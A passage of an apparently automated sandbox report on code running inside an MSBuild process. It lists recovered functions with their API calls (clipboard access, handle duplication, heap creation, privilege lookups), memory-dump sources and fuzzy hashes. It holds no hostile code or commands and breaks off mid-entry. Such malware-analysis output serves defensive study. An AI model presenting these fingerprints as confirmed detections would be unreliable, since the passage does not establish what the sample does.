                              control_flow_graph 2581 5e1e11e-5e1e124 2582 5e1e126-5e1e1f2 OleGetClipboard 2581->2582 2583 5e1e0a8 2581->2583 2591 5e1e1f4-5e1e1fa 2582->2591 2592 5e1e1fb-5e1e234 2582->2592 2585 5e1e0af-5e1e0b0 2583->2585 2587 5e1e0b7-5e1e0b9 2585->2587 2589 5e1e095-5e1e098 call 5e1d5a8 2587->2589 2590 5e1e0bb-5e1e0bf 2587->2590 2596 5e1e09d-5e1e0a1 2589->2596 2594 5e1e0c1-5e1e0d0 2590->2594 2595 5e1e110-5e1e117 2590->2595 2591->2592 2608 5e1e23c-5e1e275 2592->2608 2602 5e1e0f1-5e1e10f 2594->2602 2603 5e1e0d2-5e1e0dc 2594->2603 2596->2587 2597 5e1e0a3-5e1e0a5 2596->2597 2597->2585 2601 5e1e0a7 2597->2601 2601->2585 2603->2602 2607 5e1e0de-5e1e0f0 2603->2607 2613 5e1e285 2608->2613 2614 5e1e277-5e1e27b 2608->2614 2616 5e1e286 2613->2616 2614->2613 2615 5e1e27d 2614->2615 2615->2613 2616->2616
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858087618.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e10000_MSBuild.jbxd
                              Similarity
                              • API ID: Clipboard
                              • String ID:
                              • API String ID: 220874293-0
                              • Opcode ID: 60a8e5668ec009de7bba2afe198d02f4666702654cb12e24c91d7e196eaccdd0
                              • Instruction ID: 62d4e9782bf0072ceb93af8121196ca57f996ae592ef93889e915198525844d8
                              • Opcode Fuzzy Hash: 60a8e5668ec009de7bba2afe198d02f4666702654cb12e24c91d7e196eaccdd0
                              • Instruction Fuzzy Hash: CB51EFB4E00348CFEB14CFE9C590B9EBBF5BF48304F20902AE845AB250DB759885CB95
                              Function 0128BFC8 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2617 128bfc8-128bfcd 2618 128bfcf-128c015 2617->2618 2619 128bfc0-128bfc6 2617->2619 2620 128c01d-128c0b0 DuplicateHandle 2618->2620 2619->2617 2621 128c0b9-128c107 2620->2621 2622 128c0b2-128c0b8 2620->2622 2622->2621
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128C0A0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 55631892f1bfb03f5f1a024b2576bdcaa50c8cd50136f53ee737d5339811d810
                              • Instruction ID: f6b4af26e13c88478b55315b5010830b3fefc3f6ac406c1ceafc639802306fab
                              • Opcode Fuzzy Hash: 55631892f1bfb03f5f1a024b2576bdcaa50c8cd50136f53ee737d5339811d810
                              • Instruction Fuzzy Hash: 4641BAB9D052989FCF01CFA9D980AEEBFB0AB0A310F14906AE814B7251D3349955CF64
                              Function 0128BFD0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                              Download Yara Rule
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128C0A0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 5db56059033a8c7ab0f8440f9645385aa882e158ee03bb2caf8f383e337a25db
                              • Instruction ID: b59ec91fb271e3c06d11131d69bea1a73d5d7ec84273ef48275b376f7d0f581a
                              • Opcode Fuzzy Hash: 5db56059033a8c7ab0f8440f9645385aa882e158ee03bb2caf8f383e337a25db
                              • Instruction Fuzzy Hash: 3C419AB9D042589FCF00CFA9D580AEEFBF1BB0A310F14902AE914B7250D375A955CF64
                              Function 0128A560 Relevance: 1.6, APIs: 1, Instructions: 110memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlCreateHeap.NTDLL(00000000,00000000,00000000,00000000,?,?), ref: 0128E8EF
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: 2efe6c7b42528842a3d4ffe4be7d017dd8c9df0fe378f837d694aefada0f5789
                              • Instruction ID: 047a67cf53dc02191cda92e8cde33a0810b7ad7a3e3461d5f54ddc22171b79ab
                              • Opcode Fuzzy Hash: 2efe6c7b42528842a3d4ffe4be7d017dd8c9df0fe378f837d694aefada0f5789
                              • Instruction Fuzzy Hash: 474198B8D112589FCF00CFA9D584A9EFBF1AB09310F24902AE818B7310D375A901CF64
                              Function 0128E830 Relevance: 1.6, APIs: 1, Instructions: 109memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlCreateHeap.NTDLL(00000000,00000000,00000000,00000000,?,?), ref: 0128E8EF
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815818637.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_1280000_MSBuild.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: d89f5f162d95818f5ef35a85bf63b11c7a14e85690797c5de3678da177ace1de
                              • Instruction ID: 46988eefa98e47357cc340efa232655fff0fc0240facfd9b013df60d9acc9d30
                              • Opcode Fuzzy Hash: d89f5f162d95818f5ef35a85bf63b11c7a14e85690797c5de3678da177ace1de
                              • Instruction Fuzzy Hash: 7D4168B9D052589FCF00DFA9D984A9EFBF1BB09310F24902AE918B7310D375A945CF64
                              Function 05E1D5A8 Relevance: 1.6, APIs: 1, Instructions: 107comclipboardCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858087618.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e10000_MSBuild.jbxd
                              Similarity
                              • API ID: Clipboard
                              • String ID:
                              • API String ID: 220874293-0
                              • Opcode ID: 25c711c7ef141b93c4da36f2c729c28378240c953da0df87c78d7f4bdcc51e59
                              • Instruction ID: 01eee9e6faa887ca0f49471639a32d8cbdd4f11ffd54979eea06f4331216f6ea
                              • Opcode Fuzzy Hash: 25c711c7ef141b93c4da36f2c729c28378240c953da0df87c78d7f4bdcc51e59
                              • Instruction Fuzzy Hash: AD41BBB4D002489FEB14CFE9C584BDEBBF5AF49300F20902AE805AB264DB709885CF95
                              Function 05E1D490 Relevance: 1.6, APIs: 1, Instructions: 72comCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858087618.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e10000_MSBuild.jbxd
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0
                              • Opcode ID: aa0cde2f8e2177c9345a32ced589a75395454e8f6087dd0916ec5d8f5d27bf76
                              • Instruction ID: 873cf5dc002926315d8f9bdefae221e1a0daacd7edb44dec76c3e5d65c0981d6
                              • Opcode Fuzzy Hash: aa0cde2f8e2177c9345a32ced589a75395454e8f6087dd0916ec5d8f5d27bf76
                              • Instruction Fuzzy Hash: 5331A7B8D052589FCB10CFA9D984ADEFBF5AB09310F14906AE818B7310D375A901CFA8
                              Function 05E1DF98 Relevance: 1.6, APIs: 1, Instructions: 72comCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858087618.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e10000_MSBuild.jbxd
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0
                              • Opcode ID: f3af4dedf8dbc1b16802c458b801dc3661c4dc96b4bcd881408f0614a2974f25
                              • Instruction ID: a3f20d881a1bbe3a6dc37cba81640fb5104acde3a3dc66af4150a424339f77be
                              • Opcode Fuzzy Hash: f3af4dedf8dbc1b16802c458b801dc3661c4dc96b4bcd881408f0614a2974f25
                              • Instruction Fuzzy Hash: B03187B9D012599FCB10CFA9D985A9EFBF4FB09314F14906AE818B7310D375A941CF68
                              Function 05DE2FF0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                              Download Yara Rule
                              APIs
                              • LookupPrivilegeDisplayNameW.ADVAPI32(00000000,?,00000000), ref: 05DE2FE4
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3857740782.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5de0000_MSBuild.jbxd
                              Similarity
                              • API ID: DisplayLookupNamePrivilege
                              • String ID:
                              • API String ID: 1481351451-0
                              • Opcode ID: 8b828e33f80096abda57cfedda8b294e63a28a1f70c090275740aa110432064f
                              • Instruction ID: ecfa07522347b7bf9a53b755a12939b340091a8634162f6add5931974ef534d1
                              • Opcode Fuzzy Hash: 8b828e33f80096abda57cfedda8b294e63a28a1f70c090275740aa110432064f
                              • Instruction Fuzzy Hash: 9F01B5763007049BD710DF65E840A6BBBEAEFD82617048A2AE549CB344DB31D9058BA4
                              Function 05DEDFF0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              • LookupPrivilegeDisplayNameW.ADVAPI32(?,?,00000000), ref: 05DEE048
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3857740782.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5de0000_MSBuild.jbxd
                              Similarity
                              • API ID: DisplayLookupNamePrivilege
                              • String ID:
                              • API String ID: 1481351451-0
                              • Opcode ID: 02c3f9a662f12cd08daa0a2db6d0627801f208ba455ab9f624d50cf52352a386
                              • Instruction ID: 066420db763213888338d462ad00e81692859d1486da4b5194f83ca1f7b7f206
                              • Opcode Fuzzy Hash: 02c3f9a662f12cd08daa0a2db6d0627801f208ba455ab9f624d50cf52352a386
                              • Instruction Fuzzy Hash: CEF0A4327042146B5B11EA59EC40D7FBBEEFBC8221714442BE509C3200DA31A8059760
                              Function 05DE4AC0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              • LookupPrivilegeDisplayNameW.ADVAPI32(?,?,00000000), ref: 05DE4B19
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3857740782.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5de0000_MSBuild.jbxd
                              Similarity
                              • API ID: DisplayLookupNamePrivilege
                              • String ID:
                              • API String ID: 1481351451-0
                              • Opcode ID: 6e466a40d74b4eeeab82792dcc4a20adbd07054d97f4b58533717c8963fd38c1
                              • Instruction ID: 89c6182b515408386ab0d42051a0ab40aa756a4dca2fc33c2e8803c8ac4e5558
                              • Opcode Fuzzy Hash: 6e466a40d74b4eeeab82792dcc4a20adbd07054d97f4b58533717c8963fd38c1
                              • Instruction Fuzzy Hash: 16F08C323042196B9B14EA9AAC40DBFBBAEFF88260714842BE509C3300DA7198159764
                              Function 06660611 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861683324.0000000006660000.00000040.00000020.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6660000_MSBuild.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: f0979686ee62d197f9d4399378201c3f5ef98dbfe5a61c80fd7264db2c6230b4
                              • Instruction ID: e0d320c028ae2d32787dc443441960bf594e410181baed14dc84b03687960fb1
                              • Opcode Fuzzy Hash: f0979686ee62d197f9d4399378201c3f5ef98dbfe5a61c80fd7264db2c6230b4
                              • Instruction Fuzzy Hash: BBD0A7318189480FE7D5B13C251A3203AE1D7A9115F2546CBD899C35D7E8188C458383
                              Function 05E56DD0 Relevance: .4, Instructions: 399COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b9a88fdb51f2a4d89e6e976c6a25324b694bb3dd7f27e49dcc2c47d048bae023
                              • Instruction ID: 0c48ebf22e8dc0c6e80e19227afc5ed62eeff5e1a7c015057bcb8dae37fb9149
                              • Opcode Fuzzy Hash: b9a88fdb51f2a4d89e6e976c6a25324b694bb3dd7f27e49dcc2c47d048bae023
                              • Instruction Fuzzy Hash: F9F14A757006048FDB54DF29C489A6EBBE2FF95324F1980A9E986CB362CB35ED01CB51
                              Function 05E51D28 Relevance: .3, Instructions: 289COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 22f07984d021c605f22c4d6c6294ca2bcf28ddaecaf2f2c51a05125186f8bee5
                              • Instruction ID: 6972e2f30ac5db8c852d1c8da61488b450046e97322d6190fa6d247d423f5a07
                              • Opcode Fuzzy Hash: 22f07984d021c605f22c4d6c6294ca2bcf28ddaecaf2f2c51a05125186f8bee5
                              • Instruction Fuzzy Hash: F5B194347053409FE759DF28C044A66BBE3FF85224B19C1A9E98ACB362CB35EC85CB51
                              Function 05E5AB63 Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bd5eaaf375421fc3f335af077265a6924f5d8c33dd8c55ca70145543323d7a53
                              • Instruction ID: 8c8f61abd00b40eae856a68021bb757bfca44bdcf1ab3522dc0e875bf473db0e
                              • Opcode Fuzzy Hash: bd5eaaf375421fc3f335af077265a6924f5d8c33dd8c55ca70145543323d7a53
                              • Instruction Fuzzy Hash: 2561AA75A002099FDB15DFA4D884AAEBBF3FF88321F15816AE446D7355DB38D842CB40
                              Function 05E541D8 Relevance: .2, Instructions: 178COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3eb4732b10bc05f3d2f87282bcdf83884588f01b8614a398b926a0752e4eeca6
                              • Instruction ID: e5147273f74a2f48172e9cf18292c3080a6f3d10473b68fc32d3518b07c88664
                              • Opcode Fuzzy Hash: 3eb4732b10bc05f3d2f87282bcdf83884588f01b8614a398b926a0752e4eeca6
                              • Instruction Fuzzy Hash: 9F51B371B002099FEF01EFA4E880BDEBBB6FF88324F108429E245AB251DB755D558F95
                              Function 05E5ABD0 Relevance: .2, Instructions: 170COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 98b2db8a463cf48289d4d58a64b9fee498f3a854c027d3c855e54d7e53326b24
                              • Instruction ID: fb5ddd23304b491a334fb3dd3111abfe552d6bab1caf2029bdeba1abef2cfb80
                              • Opcode Fuzzy Hash: 98b2db8a463cf48289d4d58a64b9fee498f3a854c027d3c855e54d7e53326b24
                              • Instruction Fuzzy Hash: AE614874A012089FDB04DFA4D844AAEBBF3FF88321F248529E946A7355DB75AC41CF50
                              Function 05E51AA0 Relevance: .1, Instructions: 142COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 290c6836b09b80eaf0db0472eaf54aef4db085092b4ed3f1e2e5f3ac9003861d
                              • Instruction ID: ab0603722434be1ed5df0a1b78ea35fd81dee1777e71550db0decb9157e4f55c
                              • Opcode Fuzzy Hash: 290c6836b09b80eaf0db0472eaf54aef4db085092b4ed3f1e2e5f3ac9003861d
                              • Instruction Fuzzy Hash: 6941BF303487019BE76D8B75880076BBBEBEF85265F145929E9C7C3680EF66E881CB11
                              Function 05E5EF48 Relevance: .1, Instructions: 140COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0001289670fb244709e55472f606f26d2552eb9a7091cc21796b0774dc039f84
                              • Instruction ID: ac0351e1409011f74752f1b6631796d66340d0c62c42b1f2513c28e6bee84337
                              • Opcode Fuzzy Hash: 0001289670fb244709e55472f606f26d2552eb9a7091cc21796b0774dc039f84
                              • Instruction Fuzzy Hash: 0551A2B1A042559FDB11DF68C884EAEBBF2FF45320F198195E8A5DB3A1C731E940CB60
                              Function 05E5E7C8 Relevance: .1, Instructions: 139COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a8c3773712e6616aaa22e6b54c63fc4486d166dab3b056e7568fc3cc513ae808
                              • Instruction ID: 293882c4d93aa4fc9e5c07ffca0dd71f9b080c56effc4ddf86c96c24cd5e1778
                              • Opcode Fuzzy Hash: a8c3773712e6616aaa22e6b54c63fc4486d166dab3b056e7568fc3cc513ae808
                              • Instruction Fuzzy Hash: 81418076600209AFDB15DF98E844CBFBBBAFF88320B148066FA55D3211C735D921DBA0
                              Function 05E56C18 Relevance: .1, Instructions: 134COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 866f75c737165a7c7536e066fcaa20d8355fc0b27932c8a3545f64a34a23fc80
                              • Instruction ID: a26252da72bb891c798ce7f2416f4d10ffebff25470f87f22357895a3fc0768e
                              • Opcode Fuzzy Hash: 866f75c737165a7c7536e066fcaa20d8355fc0b27932c8a3545f64a34a23fc80
                              • Instruction Fuzzy Hash: 8F51BFB4A00705DFDB44DF68C4849AABBF2FF89314B118AA9D4099B362DB30ED45CB90
                              Function 05E56C28 Relevance: .1, Instructions: 130COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d94846ffb9f9eb5e6e349c800e64b2ecd64b6530f96625193cb56e5c06d763e8
                              • Instruction ID: 44896a8617e3fcc8038ff2813f8ca89b1259f32bb9d4cee3a2201b26d69d3fd9
                              • Opcode Fuzzy Hash: d94846ffb9f9eb5e6e349c800e64b2ecd64b6530f96625193cb56e5c06d763e8
                              • Instruction Fuzzy Hash: B251BFB4A00305DFDB44DF68C4849AEBBF2FF88314B1186A9D4099B362DB30EE45CB90
                              Function 05E57508 Relevance: .1, Instructions: 126COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 45a34f8efd9e0eb80a827501afd20f4cac82eb46fa61e12819df9a6008655adc
                              • Instruction ID: d32e4e3dbf1da2a171d09c1cd7a62f7fa92264a8ce3c568cddb8748e8cb22c09
                              • Opcode Fuzzy Hash: 45a34f8efd9e0eb80a827501afd20f4cac82eb46fa61e12819df9a6008655adc
                              • Instruction Fuzzy Hash: FE4102317006158FDB21CF69D984A6ABBB6FFC4360B158466D985CB311DB30E811CBA0
                              Function 05E557E8 Relevance: .1, Instructions: 122COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2bb8dd83eeeb17629bef2b9c658b37850bf7977ed8186236c675fed069cfe6a1
                              • Instruction ID: 83f67fb0ad406f5c674395d64970ce6ffe094ef305b4da551c2c07a2e6ac65d0
                              • Opcode Fuzzy Hash: 2bb8dd83eeeb17629bef2b9c658b37850bf7977ed8186236c675fed069cfe6a1
                              • Instruction Fuzzy Hash: BF41BF75A0020AAFDB04CF54D840AAEFBB6FF48324F10826AE5099B241D775ED56CFD0
                              Function 05E58CE0 Relevance: .1, Instructions: 119COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b5cc83bc708716262d81ab4c7b235a985778c390f1e2bc8bd4451c0124efb3f0
                              • Instruction ID: 9d91b8355f81097598e47225d3aecb1945023da52670972481aee95295449d92
                              • Opcode Fuzzy Hash: b5cc83bc708716262d81ab4c7b235a985778c390f1e2bc8bd4451c0124efb3f0
                              • Instruction Fuzzy Hash: 69412270B086058BEB28DF25D81476EBBF7BF88624F248529C846A7380DF319C02C794
                              Function 05E57760 Relevance: .1, Instructions: 118COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2af55bb27ab222d330371898e5d16661ee1dd3ecb68497c095c518655cc8164c
                              • Instruction ID: 7d7c3f53a43208d1e5a86b44046eb71dac0e386cba6d60dbd6ee62a2e5004f21
                              • Opcode Fuzzy Hash: 2af55bb27ab222d330371898e5d16661ee1dd3ecb68497c095c518655cc8164c
                              • Instruction Fuzzy Hash: A941DE36704614CFD715CF79D984A2ABBF5FF88365B1980AAD989CB361DA30EC40CB60
                              Function 05E55958 Relevance: .1, Instructions: 100COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 706529e320b4280c63e1777bcb1bb204f4f60cdcf64a0f55633578559a173fd1
                              • Instruction ID: 4db0986f2b651e3d7444796a2ed559b6497ab6661b7d8c3cb5460b314491442b
                              • Opcode Fuzzy Hash: 706529e320b4280c63e1777bcb1bb204f4f60cdcf64a0f55633578559a173fd1
                              • Instruction Fuzzy Hash: 0B4157352002009FD755DF24C488E59BBE6EF89330B16C4AAEC998B362DB75ED45CB50
                              Function 05E56080 Relevance: .1, Instructions: 98COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e38378402b4d6d88c3a6475c079a7344655bede72cb53ccae9a98f508f8e7271
                              • Instruction ID: 5170c355c4cff3cde2323e0a0ddfa6e96798f49e2999e439b316759b6d405f5e
                              • Opcode Fuzzy Hash: e38378402b4d6d88c3a6475c079a7344655bede72cb53ccae9a98f508f8e7271
                              • Instruction Fuzzy Hash: EF31D6706003019FE735DF20D884A6ABBF2FF85324F544969D9858B652DB31FD08CB52
                              Function 05E55949 Relevance: .1, Instructions: 97COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 08cff7ae33861aa7b640ef3dee241675609b23703eb317e39a3146c04b871abc
                              • Instruction ID: 0dca8c7817da87540ac5c9fa092c5d8749ea0ee65a4e7d4683111271a000210d
                              • Opcode Fuzzy Hash: 08cff7ae33861aa7b640ef3dee241675609b23703eb317e39a3146c04b871abc
                              • Instruction Fuzzy Hash: F73146352002009FD315DF24C488E6ABBF6FF89330B15C4AAE8898B322D779ED44CB10
                              Function 05E535C0 Relevance: .1, Instructions: 87COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 10fe50ab5aa814d2bf2afa5d230765a25a3b46d22da6605a0480075fae57d26a
                              • Instruction ID: bf99c94eb70335979deedfd6ea6caeba8b5ed14f590cd52fbcf3550b85153c25
                              • Opcode Fuzzy Hash: 10fe50ab5aa814d2bf2afa5d230765a25a3b46d22da6605a0480075fae57d26a
                              • Instruction Fuzzy Hash: D621B776300204AFDB04CF95D884DAABBE6FB4C3B1B048539FA08CB210D771D814DB90
                              Function 05E578A0 Relevance: .1, Instructions: 82COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 31aa1d677a7cac97b6ab4edc4057ef93178de9411b74a3ee5cab82afaca329e0
                              • Instruction ID: a13741fcf59071fafafec77d26484f1fb790b43850aafd423f1dd3410901727c
                              • Opcode Fuzzy Hash: 31aa1d677a7cac97b6ab4edc4057ef93178de9411b74a3ee5cab82afaca329e0
                              • Instruction Fuzzy Hash: 782139353101108FD708DF3AD888D6A7BEAEFC9A6471641A9EA46CB371DF30DC018BA0
                              Function 0121D63C Relevance: .1, Instructions: 77COMMON
                              Download Yara Rule
                              Memory Dump Source
